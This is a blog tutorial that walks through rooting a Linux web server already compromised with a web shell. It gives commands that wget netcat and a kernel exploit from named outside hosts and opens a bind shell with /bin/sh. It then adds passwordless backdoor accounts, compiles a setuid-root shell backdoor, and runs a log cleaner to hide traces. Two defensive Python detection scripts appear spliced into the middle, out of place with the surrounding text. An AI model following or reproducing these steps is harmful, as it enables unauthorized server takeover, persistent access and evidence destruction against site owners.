
Monday, January 5, 2009

Tutorial Local Root Exploit

Posted by xshadow On June - 21 - 2008

OK, let's just get on with it.. here's a tutorial on local root exploits :D

OK, the tools you need (requirements):

- a shell that has already been injected

- mig-log cleaner ==> hxxp://kvazar.ru/virtualhost/lg/files/miglc

- netcat ==> hxxp://h1.ripway.com/xshadow/wp/nc111nt.zip

- netcat ==> hxxp://kvazar.ru/virtualhost/lg/files/nc

- local root exploit ==> hxxp://www.linuxrootkit.cn/localroot/ or hxxp://www.y0ume.net/localroot/

- a little brainpower

- attention to detail

OK, moving on…

1. Open the shell you have injected…

wherever it was that you put that shell…

http://target.com/shellinjectkalian.php

2. Download the netcat file to run on the target… if you are using the c100 shell you just pick one.. either backconnection or backdorhost… if you are using your own modified shell… you will have to download the netcat file I provided…

wget http://kvazar.ru/virtualhost/lg/files/nc

once it has been downloaded, change its mode so that it can be executed…

chmod +x nc

after changing the mode…

execute the nc file

./nc -l -p 8080 -e /bin/sh

once netcat is installed… let's run it from our own PC :))

nc VictimIP Port (the port used in this example is 8080; that number can be changed to whatever we like)

eg: nc 321.321.321 8080

once the backconnect output shows up in our netcat window…

we move on to the next part… download the local exploit… don't forget.. match the exploit to the target's kernel… (so that it fits). The file has a *.c extension

I'll use h00lyshit.c as the example

wget hxxp://www.linuxrootkit.cn/localroot/h00lyshit.c

once it is downloaded… compile the C file…

gcc h00lyshit.c -o h00lyshit;chmod +x h00lyshit (the ; chains multiple commands… usually used by lazy people…)

a file named h00lyshit will appear.. after that, execute it…

./h00lyshit

at this stage you have to be patient… it usually takes a really long time…

when it has finished.. and there is no error message at all… try running the following command…

whoami

or

id

you will see

uid=0(root) gid=0(root) groups=500(apache) or whatever.. the point is, root :P

now it's time to get drunk… hahaha….

wait.. once you're drunk… don't forget the following…

we add a user… make sure of it first… and we create a backdoor

add user

/usr/sbin/useradd robber -g wheel -s /bin/bash -d /etc/.robber
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/adduser robber -g root -d /home/robber -s /bin/bash
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/adduser ftp -g root -d /home/robber -s /bin/bash
passwd -d xshadowyangtampantiadaduanya

/usr/sbin/useradd mailbin -c mail -d /var/spool/mail

/etc/init.d/httpd restart

ok

or

#include
#include
#include
#include

int main( void )
{
setuid( 0 );
system( “/bin/bash” );

return 0;
}

root@xshadow /root# gcc -o .bkdr main.c
root@xshadow /root# chown root:root .bkdr
root@xshadow /root# chmod +s .bkdr

compile it and change its permissions :D

you will get the file .bkdr… from there it gets placed on the $PATH, and if it is executed as another user then

guest@xshadow /home/guest$ /usr/local/bin/.bkdr
root@xshadow /home/guest# whoami
root

there you go.. back to being root again :P
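The account and setuid changes above leave artifacts that can be checked directly during triage. The following Python is an added example, not part of the original post; the passwd/shadow/group entries are constructed, and the service-name list and expected setuid directories are assumptions to tune per host.

```python
import os
import stat

LOGIN_SHELLS = {"/bin/sh", "/bin/bash"}
SERVICE_NAMES = {"ftp", "mail", "apache"}                    # assumption: tune per host
SYSTEM_BIN = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")  # assumption: expected setuid dirs
# Constructed sample data modelled on the accounts the post creates.
PASSWD = """root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
robber:x:501:10::/etc/.robber:/bin/bash
ftp:x:14:0:FTP User:/home/robber:/bin/bash"""
SHADOW = "root:$1$constructed$placeholder:14000:0:99999:7:::\nrobber::14249:0:99999:7:::"
GROUP = "root:x:0:\nwheel:x:10:\napache:x:48:"

def _rows(text):
    return [line.split(":") for line in text.splitlines() if line.strip()]

def audit_accounts(passwd, shadow, group, priv_groups=("root", "wheel")):
    """Map user -> list of reasons it matches the persistence patterns in the post."""
    priv_gids = {g[2] for g in _rows(group) if g[0] in priv_groups}
    no_password = {s[0] for s in _rows(shadow) if s[1] == ""}   # what `passwd -d` leaves
    findings = {}
    for name, _pw, uid, gid, _gecos, home, shell in _rows(passwd):
        reasons = []
        if name != "root" and (uid == "0" or gid in priv_gids):
            reasons.append("privileged uid/gid")
        if any(part.startswith(".") for part in home.split("/")):
            reasons.append("hidden home directory")
        if name in no_password:
            reasons.append("empty password")
        if name in SERVICE_NAMES and shell in LOGIN_SHELLS:
            reasons.append("service account with login shell")
        if reasons:
            findings[name] = reasons
    return findings

def suspicious_setuid(path, mode, uid):
    """True for a root-owned setuid regular file that is hidden or outside SYSTEM_BIN."""
    setuid_root = stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0
    return setuid_root and (os.path.basename(path).startswith(".") or not path.startswith(SYSTEM_BIN))

def scan_setuid(top):
    hits = []
    for d, _dirs, files in os.walk(top):
        for p in (os.path.join(d, f) for f in files):
            st = os.lstat(p)
            if suspicious_setuid(p, st.st_mode, st.st_uid):
                hits.append(p)
    return hits
```

On a live host, pass the contents of /etc/passwd, /etc/shadow and /etc/group to `audit_accounts()` and run `scan_setuid("/")` as root.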

now it's time to clean up your mess.. :P

wget hxxp://kvazar.ru/virtualhost/lg/files/miglc;chmod +x miglc

run the cleaner

./miglc

success… hehe…

enjoy whatever you do next :P

oh, and.. if you install a shell on a site that is on there… you will find the shell has root rank
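Every step in this post is a process execution by the web-server account or by a root process descended from it, so it shows up in exec auditing even after local logs are cleaned, provided the records are shipped off-host. The following Python is an added example, not part of the original post; the auditd records are constructed and abridged, and uid 48 for the web account and syscall number 59 (execve on x86_64) are assumptions.

```python
import re

WEB_UIDS = {"48"}   # assumption: uid of the web-server account on this host
EXECVE = "59"       # assumption: execve syscall number on x86_64
STAGING = {"wget", "curl", "gcc", "cc", "nc", "chmod"}
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# Constructed, abridged auditd SYSCALL records following the order of steps in the post.
AUDIT_LOG = """\
type=SYSCALL msg=audit(1230000000.000:200): syscall=59 ppid=1 pid=900 uid=0 euid=0 comm="crond" exe="/usr/sbin/crond"
type=SYSCALL msg=audit(1230000001.000:201): syscall=59 ppid=2211 pid=2300 uid=48 euid=48 comm="wget" exe="/usr/bin/wget"
type=SYSCALL msg=audit(1230000002.000:202): syscall=59 ppid=2211 pid=2302 uid=48 euid=48 comm="nc" exe="/var/www/html/nc"
type=SYSCALL msg=audit(1230000003.000:203): syscall=59 ppid=2302 pid=2310 uid=48 euid=48 comm="gcc" exe="/usr/bin/gcc"
type=SYSCALL msg=audit(1230000004.000:204): syscall=59 ppid=2302 pid=2311 uid=48 euid=48 comm="h00lyshit" exe="/tmp/h00lyshit"
type=SYSCALL msg=audit(1230000005.000:205): syscall=59 ppid=2302 pid=2311 uid=0 euid=0 comm="sh" exe="/bin/sh"
type=SYSCALL msg=audit(1230000006.000:206): syscall=59 ppid=2311 pid=2320 uid=0 euid=0 comm="useradd" exe="/usr/sbin/useradd"
"""

def parse(line):
    """Turn one auditd record into a dict of its key=value fields."""
    return {key: quoted or bare for key, quoted, bare in FIELD.findall(line)}

def detect(log_text, web_uids=WEB_UIDS):
    """Return (event_id, comm, reason) for suspicious execs in a web-server process lineage."""
    lineage, alerts = set(), []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec.get("type") != "SYSCALL" or rec.get("syscall") != EXECVE:
            continue
        event = rec["msg"].split(":")[1].rstrip(")")
        if not (rec["uid"] in web_uids or rec["ppid"] in lineage or rec["pid"] in lineage):
            continue
        lineage.add(rec["pid"])   # remember the pid so its children are followed too
        if rec["euid"] == "0":
            alerts.append((event, rec["comm"], "root exec in web-server lineage"))
        elif rec["comm"] in STAGING or rec["exe"].startswith(TMP_DIRS):
            alerts.append((event, rec["comm"], "web account staging tools"))
    return alerts

if __name__ == "__main__":
    for alert in detect(AUDIT_LOG):
        print(*alert, sep="\t")
```

Legitimate setuid helpers started by the web server will also raise the root-lineage alert and need an allowlist.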
